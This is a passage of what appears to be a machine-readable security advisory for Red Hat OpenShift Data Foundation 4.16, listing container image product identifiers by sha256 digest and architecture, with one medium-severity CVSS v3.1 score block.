"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", 